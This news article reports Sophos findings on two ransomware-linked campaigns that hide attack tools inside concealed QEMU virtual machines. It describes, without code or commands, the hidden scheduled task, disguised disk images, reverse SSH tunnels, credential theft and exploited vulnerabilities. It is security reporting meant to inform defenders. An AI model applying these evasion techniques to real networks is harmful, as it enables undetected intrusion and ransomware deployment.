- Hidden virtual machines allow attackers to bypass endpoint security and go unnoticed
- The attackers used trusted virtualization tools and embedded software to disguise malicious activity.
- Sophos links campaigns using QEMU to ransomware deployment and long-term network access
Attackers are increasingly hiding malicious tools inside virtual machines to bypass security controls.
Sophos analysts say the approach relies on virtualization software that security systems often treat as legitimate activity.
In recent incidents, attackers used QEMU, an open source machine emulator and virtualizer, to run hidden environments where malicious activity remained largely invisible to endpoint defenses and left minimal evidence on the host system.
Article continues below.
A growing tendency to evade
Sophos notes that while the method is not new, it has gained traction again, with two active campaigns, tracked as STAC4713 and STAC3725, identified since late last year.
In the STAC4713 campaign, attackers created a scheduled task called TPMProfiler to start a hidden QEMU virtual machine with system-level privileges.
The virtual machine used disguised disk images, which first appeared as database files and then posed as dynamic link libraries.
Once launched, the virtual machine established reverse SSH tunnels that created covert remote access channels, allowing attackers to run tools and collect domain credentials without exposing the activity to traditional security tools.
Sophos researchers also observed that attackers used built-in Windows utilities, such as Microsoft Paint, Notepad, and Edge, to access files and discover networks. This relied heavily on trusted software to combine malicious actions with routine system behavior.
Earlier intrusions linked to the campaign used exposed VPN systems without multi-factor authentication, while later incidents exploited a SolarWinds web help desk vulnerability tracked as CVE-2025-26399. These varied entry points show attackers adjusting their tactics depending on the available weaknesses.
Sophos links the STAC4713 campaign to the PayoutsKing ransomware, which focuses on encrypting virtualized environments.
The group behind the ransomware appears to target hypervisors and implement tools that can operate on VMware and ESXi systems.
The second campaign, STAC3725, relied on exploiting the CitrixBleed2 vulnerability to gain initial access before installing remote access software.
The attackers then launched a QEMU virtual machine to manually assemble attack tools for credential theft and network reconnaissance.
Instead of delivering payloads out of the box, the attackers compiled their toolkits inside the virtual machine after gaining access. That approach allowed them to personalize attacks and reduce the chance of being detected by signature-based defenses.
Sophos warns that hiding activity within virtual machines represents a growing evasion trend. Strong endpoint protection, network monitoring, and timely patching of exposed systems are critical to reducing risk.
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds.
